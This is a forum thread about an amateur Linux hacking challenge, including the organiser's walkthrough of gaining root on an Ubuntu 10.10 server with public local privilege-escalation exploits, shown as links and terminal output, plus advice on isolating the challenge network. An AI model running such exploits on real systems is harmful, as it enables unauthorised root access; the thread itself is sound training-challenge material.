Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie
Hi there,
There is an issue with role permissions that is being worked on at the moment.
If you are having trouble with access or permissions on regional forums please post here to get access: https://www.boards.ie/discussion/2058365403/you-do-not-have-permission-for-that#latest

Security Challenge IV (Experimental)

  • 29-05-2011 10:52am
    #1
    Closed Accounts Posts: 2,267 ✭✭✭


    Ok as the title says, this is just an experimental challenge I quickly threw together last night. It may not work too well, or may not work at all, so don't be too disappointed. But this challenge steers away from the other web apps kind of challenges here to try something different, which in turn I hope is pretty fun for the challenger.

    The Challenge: Use whatever means necessary to get on the Hall of Fame (You'll see the Hall of Fame when you start)

    Due to the nature of this challenge, there is potential for abuse. You are free to play around with server once you don't ruin the challenge for others.

    Also, to stop random people/ trollers/ non boards.ie members coming across this thread, you can email me ( damienreilly @ gmail.com ) for the server ip with your boards username or post here or send me a PM. If I recognize you, I will give out the address, You I will hopefully be able to reply to you pretty quickly. Users with 1 post.. heheh eh no!


«1

Comments

  • Closed Accounts Posts: 558 ✭✭✭rcdk1


    Would PM not be more appropriate rather than asking people to disclose their private email addresses? (given that this is the security forum :p)
    having said that, I'm not knocking what you've done and would be interested in having a look.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    rcdk1 wrote: »
    Would PM not be more appropriate rather than asking people to disclose their private email addresses? (given that this is the security forum :p)
    having said that, I'm not knocking what you've done and would be interested in having a look.

    Emails come straight through to my phone when away from the laptop, also I'm sure most people got a 2nd address when messing around.


  • Registered Users Posts: 367 ✭✭900913


    If your worried about your email address use something like yopmail.com

    *edit
    soory you cant send emails from yopmail.
    Use hushmail instead


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    You can me a PM either if yous prefare that or even post here.. Might be slower response though.


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    E-mail sent :D


  • Advertisement
  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Bad news: I had to remove one of the parts of the challenge, it was causing problems when accessed externally outside my network.

    The good news: this makes the challenge easier for you, but maybe a little less fun.


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Just logged in there and had a wee peak. I'll give it a proper bash tomorrow - jaded tonight.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Thoes that created accounts earlier today will have to do that again I'm afraid. Sorry.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Sigtran completed it first, well done to him.

    Just a reminder, your own home folder are private and noone can view their content, but make sure to clean up anything you do outside your home dir that others could be able to steal ideas from or use.

    Cheers to Sigtran for already doing this.


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Done ;)


  • Advertisement
  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Sweet. And I may have an idea for a second challenge where that first step is only the first part :-)


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Wait and see if a few people get it anyways first :D


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    I think some may have given up. Remember I said "use any means necessary" :-)


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    I passed on the details privately to a friend. He's going to drop you an e-mail anyways out of courtesy :)


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    That's no problem :-)


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Any of you's with super powers can have fun with:
    echo "message" | wall
    


    or send personal messages to someones terminal:
    echo "message" > /dev/pts/?
    

    Use who to get their pts number.


    This is also a fun one to do on a large server (non destructive):
    tput bel | tee `who | awk '{printf "/dev/"$2" "}'`
    
    makes eveyone's terminal beep.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Latest:

    Challenge IV Hall of Fame:
    Sigtran
    peann
    rockethamster
    900913
    Pygmalion
    


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Nice :) Thoroughly enjoyable challenge Damo. You're some man for one man :D


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Anyone else wanna try it, if not, I will take it down tonight and post the (very little) source code involved.

    Anyone wanna ask about particular server setup or aspects of the challenge?


  • Closed Accounts Posts: 2,486 ✭✭✭Redshift


    I haven't had time to really get a look at this. Im working on finishing a course assignment. So i think ill give it a miss im not great with *nix anyway.
    Thanks for putting it together.


  • Advertisement
  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Redshift, if you need any pointers - just send me a message :)


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Final Hall of Fame:
    Sigtran
    peann
    rockethamster
    900913
    Pygmalion
    


    Solution:
    First page tells you, you are getting webspace for free. Register an account.

    You are told that your account is created and you can upload it via sftp. You may already know that sftp is secure ftp. Almost always paired with ssh (secure shell) in the one daemon over the same port. So you might try connect to the server via sftp client e.g. WinSCP or OpenSSH's sftp command line utility, but more interestingly you might have tried to connect over SSH to check if Shell access was disabled or not. Shell access wasn't disabled.. dumb administrator!!

    Ok you logged in and are greeted with:
    login as: damo
    damo@damo-challenge4.dyndns.biz's password:
    Linux challenge4server 2.6.35-22-generic-pae #33-Ubuntu SMP Sun Sep 19 22:14:14 UTC 2010 i686 GNU/Linux
    Ubuntu 10.10

    Welcome to Challenge IV.
    Due to the nature of this challenge, there is lots of potential for abuse.
    You are free to play around with the server, once you do not prevent other users from attempting the challenge.

    Challenge IV Hall of Fame:
    Sigtran
    peann
    rockethamster
    900913
    Pygmalion



    damo@challenge4server:~$

    Snooping around the server, you see that the other challengers home directories are unreadable. But you can see that a script exists in / called UPDATE_HALL_OF_FAME.sh.

    damo@challenge4server:/$ ls -l UPDATE_HALL_OF_FAME.sh
    -rwx
    1 root root 213 2011-05-30 17:20 UPDATE_HALL_OF_FAME.sh

    Only root will have access to read and execute this, so maybe you need to become root?

    You have local access to the server, maybe we can execute a local privilege escalation execution exploit?

    You can pop onto exploit-db.com and search for: platform: linux type: local

    Enter command on the server: uname -a
    damo@challenge4server:~$ uname -a
    Linux challenge4server 2.6.35-22-generic-pae #33-Ubuntu SMP Sun Sep 19 22:14:14 UTC 2010 i686 GNU/Linux
    damo@challenge4server:~$

    You now the ubuntu version: 10.10, archiecture: x86 and kernel: 2.6.35-22 so this should make your searching easier. If not, then just trial and error some exploits.


    PAM MOTD Local Root Exploit: (note: this one is reported as tested on 9.10 and 10.04 LTS but does however work on 10.10)
    http://www.exploit-db.com/exploits/14339/
    damo@challenge4server:~$ ./pam_motd.sh
    [%] Ubuntu PAM MOTD local root
    [%] SSH key set up
    [%] Backuped /home/damo/.cache
    [%] spawn ssh
    [+] owned: /etc/passwd
    [%] spawn ssh
    [+] owned: /etc/shadow
    [%] Restored /home/damo/.cache
    [%] SSH key removed
    [+] Success! Use password toor to get root
    Password:
    root@challenge4server:/home/damo# id
    uid=0(root) gid=0(root) groups=0(root)
    root@challenge4server:/home/damo# whoami
    root
    root@challenge4server:/home/damo#


    Linus RDS Local Privilege escalation:
    http://www.exploit-db.com/exploits/15285/
    damo@challenge4server:~$ ./local-rds.c
    [%] Linux kernel >= 2.6.30 RDS socket exploit
    [%] by Dan Rosenberg
    [%] Resolving kernel addresses...
    [+] Resolved security_ops to 0xc09ddc0c
    [+] Resolved default_security_ops to 0xc08137a0
    [+] Resolved cap_ptrace_traceme to 0xc030c580
    [+] Resolved commit_creds to 0xc0174b20
    [+] Resolved prepare_kernel_cred to 0xc0174f70
    [%] Overwriting security ops...
    [%] Overwriting function pointer...
    [%] Triggering payload...
    [%] Restoring function pointer...
    [%] Got root!
    # id
    uid=0(root) gid=0(root) groups=0(root)
    # whoami
    root
    #



    Linux Kernel <= 2.6.37 Local Privilege Escalation (full-nelson):
    http://www.exploit-db.com/exploits/15704/
    damo@challenge4server:~$ ./full-nelson
    [%] Resolving kernel addresses...
    [+] Resolved econet_ioctl to 0xe0a882a0
    [+] Resolved econet_ops to 0xe0a883a0
    [+] Resolved commit_creds to 0xc0174b20
    [+] Resolved prepare_kernel_cred to 0xc0174f70
    [%] Calculating target...
    [%] Failed to set Econet address.
    [%] Triggering payload...
    [%] Got root!
    # id
    uid=0(root) gid=0(root) groups=0(root)
    # whoami
    root
    #

    Lets add our name to the hall of fame:
    # bash
    root@challenge4server:/# cd /
    root@challenge4server:/# ./UPDATE_HALL_OF_FAME.sh
    Usage: ./UPDATE_HALL_OF_FAME.sh <name>
    Adds a user name to the Challenge IV Hall of Fame.
    root@challenge4server:/# ./UPDATE_HALL_OF_FAME.sh damo
    damo added to the Hall of Fame. Congratulations.
    root@challenge4server:/#


    Lets check, re-log in to check the dynamic MOTD:
    login as: damo
    damo@damo-challenge4.dyndns.biz's password:
    Linux challenge4server 2.6.35-22-generic-pae #33-Ubuntu SMP Sun Sep 19 22:14:14 UTC 2010 i686 GNU/Linux
    Ubuntu 10.10

    Welcome to Challenge IV.
    Due to the nature of this challenge, there is lots of potential for abuse.
    You are free to play around with the server, once you do not prevent other users from attempting the challenge.

    Challenge IV Hall of Fame:
    Sigtran
    peann
    rockethamster
    900913
    Pygmalion
    damo



    damo@challenge4server:~$



    Thats it.

    If anyone is interested, the main web script for this challenge was a CGI script written in perl that had the setuid bit set for root. 99.99% of times there is no excuse to use CGI+setuid as root. It can be a major security risk and design flaw. Perl tries to minimise the threat by forcing you sanitise all data you use that was attained externally from the script itself.

    I have attached the script if anyone wants to create a similar challenge.

    Some files had been set as immutable or append only, to prevent "root" users accidentally deleting files or erasing data from files.

    Any other questions?


  • Registered Users Posts: 367 ✭✭900913


    I had a look at this on sunday night I think, after a four day drinking binge.

    I thought I'd have to use metasploit which I have never used live.

    Sobered up tuesday and had a look and did a

    uname -a

    and then as a long shot googled "local root exploit 2.6.35"

    I'd love to know what the other part was as I normally don't try root servers any more, I'm happy getting mysql root.

    Thanks again Damo for another real life like challenge..

    Great....


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Also:

    Giving people access to a linux server on your network with root access can potentially be dangerous. Even in a VM, they will either share a lan with your router/gateway, or its own network with the host OS since you gave the guest OS outgoing and incoming access to/from the internet.

    What if someone on the vm installs wireshark, ettercap, sslsniff, sslstrip. They can then potentially sniff all the traffic on your network, or sniff the traffic on the host OS. What if they mess with the settings on your router?

    A solution is to set-up a VLAN on your router/gateway and separate the traffic between your normal home network for all your devices with one VLAN and a separate VLAN for the challenge.

    If you are running the challenge in a virtual machine on a machine that you actively use, to separate the traffic, you will need 2 interfaces to your router.

    I will talk here how to do it with two wifi adapters, but it probably could be done with 2 ethernet or 1 wifi & 1 ethernet, but I haven't tried that. My laptop is upstairs and router is downstairs, so I went with 2 wifi. Built in card, and a USB adapter. You will need a USB wifi adapter to allow a guest OS full access to it through a host. PCMCIA wont work.

    I have a Netopia 2247NG-EIR(com) so to perform this with this router, I did:

    - Enable 2nd SSID, WPA2 key, Closed System Mode (SSID is not broadcasted).
    - Enable Expert Mode. Go to Configure, Advanced, VLAN
         Enable first VLAN. 
             Name: vcc
             Type: By Port
             Admin Restricted: no
             Portname: vcc1
             Ip Interface: ip-vcc1
             Inter VLAN Group: Group A & B
         Enable second VLAN. 
             Name: normal
             Type: By Port
             Admin Restricted: no
             Portname: all interfaces for normal use e.g. eth0.1, eth0.2, ssid1
             Ip Interface: ip-eth-a
             Inter VLAN Group: Group A
         Enable third VLAN. 
             Name: restricted
             Type: By Port
             Admin Restricted: yes (blocks accessing router settings)
             Portname: interface for the challenge server (for me ssid2)
             Ip Interface: ip-eth-a
             Inter VLAN Group: Group B
    


    - Configure VMware or VBOX guest OS to have no virtual network adapter. Remove it completey. Host-only is not good enough in my opinion. Make sure your virtual machine is configured to use your USB wifi adapter. In VMWARE you click the usb icon at the bottom of the player to tell it to disconnect the usb device from host OS and connect it to the guest OS.

    - Inside the guest OS, manually connect the WIFI adapter to the new SSID you created for the challenge.

    I guess if your using ethernet, you need a virtual network adapter and bridge it to your actual ethernet adapter. You can do this with both VBOX and VMWARE.

    NAT/Port forwarding is still possible. Its works same as before when you didn't have VLAN setup. Just forward the port to the IP of the Guest OS.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    900913 wrote: »
    I'd love to know what the other part was as I normally don't try root servers any more, I'm happy getting mysql root.

    You may see in a future challenge!


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    First thing I did was scour over the cgi script for input validation, as I saw it was SUIDto root. Couldn't see anyway inherent flaws, so I checked for misconfigurations on the system. Tbh, I didn't expect it to be a local exploit on account of the usual nature of the challenges. Only when I couldn't find any config errors did I run the full-nelson exploit. Bob's your uncle.


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Also, when I originally logged in - I had read access to other user's directories including read access to their .bash_history. Could have given the competition away for many people had anyone had rooted it at that point.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    dlofnep wrote: »
    Also, when I originally logged in - I had read access to other user's directories including read access to their .bash_history. Could have given the competition away for many people had anyone had rooted it at that point.

    Aye, to be honest I was still patching/coding the challenge as I went along. hence the "experimental" hehe. I later chmod'ed the dirs 701. i did remove a rather significant part of the challenge also about 8 hours into it as it was causing problems. Didn't cause problems for me locally, so I didn't see it.


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Aye, no worries. Cheers again for the challenge. Great fun as always.


  • Advertisement
  • Registered Users Posts: 367 ✭✭900913


    On the main login/create account page I tried use the name root as my account.

    I think it created a user root in the home directory "/home/root", but it wouldn't let me login to ssh. :(

    Also Rockethamster used the same username/password combo.
    Rockethamster:Rockethamster and left a root exploit in his /home directory.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    900913 wrote: »
    On the main login/create account page I tried use the name root as my account.

    I think it created a user root in the home directory "/home/root", but it wouldn't let me login to ssh. :(

    I later patched that. Original root account wouldn't be over written anyway.


  • Closed Accounts Posts: 14 Sigtran


    Thanks for the challenge :pac: Damo! Hope to see more of the linux type challenges ^;;^


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Sigtran wrote: »
    Thanks for the challenge :pac: Damo! Hope to see more of the linux type challenges ^;;^


    Maybe Solaris/FreeBSD/NetBSB/OpenBSD.


  • Closed Accounts Posts: 14 Sigtran


    it might be harder to find something in a BSD, as its default is to not give access to anything... you might find yourself having to make a custom hole in the system... this would be more of a misconfiguration, leading to an attack, then an actual vulnerability based on the mainstream libs /etc (i dono much of BSD, as it is not my system of choice, so i could be wrong here)


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Gobbles disagrees :D


  • Advertisement
  • Closed Accounts Posts: 18,966 ✭✭✭✭syklops


    f**k f**kity f**k f**k!

    This sort of challenge I would have done well in and I missed it. :(

    Sad Panda now.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Might revive this one again with some added security :-P


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    I've an idea for a challenge also Damo. Just need to code it.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    dlofnep wrote: »
    I've an idea for a challenge also Damo. Just need to code it.

    Cool, what area are you thinking of?


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Cool, what area are you thinking of?

    Writing a flawed application that selected people would have to exploit. I could give GCC & GDB access via a shell.


  • Advertisement
  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    dlofnep wrote: »
    Writing a flawed application that selected people would have to exploit. I could give GCC & GDB access via a shell.
    Or let them download the binary?


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Or let them download the binary?

    That could be an option too!


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    I did something like that for windows 2k a few years back
    http://www.boards.ie/vbulletin/showthread.php?p=56624243

    Its pretty good fun.


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Do you fancy hosting that challenge again? I'd be interested!


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    I could look into it. Conceited hosted it last time as he was running some war games on win2k.


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Do you still have the binary? I'd be interested in just writing an exploit for it for the craic anyway, if you can't find someone to host it. You could just evaluate the code. It should be pretty evident if it works or not.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Yeah its posted in this thread:

    http://www.boards.ie/vbulletin/showpost.php?p=56619597&postcount=169

    It should be exploitable on Win 2k SP0-SP4, Win XP SP0-SP3, although DEP on XP SP3 will make it a greater challenge. Not sure about Vista SP0.


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Yeah its posted in this thread:

    http://www.boards.ie/vbulletin/showpost.php?p=56619597&postcount=169

    It should be exploitable on Win 2k SP0-SP4, Win XP SP0-SP3, although DEP on XP SP3 will make it a greater challenge. Not sure about Vista SP0.

    I only have a windows XP VM. I'll install it on that and have a toy with it. I wouldn't worry about DEP.


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Just to make sure - When I run the server, it terminates before it allows me to input a name. Is that normal?


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    No, it should terminate after.


  • Advertisement
Advertisement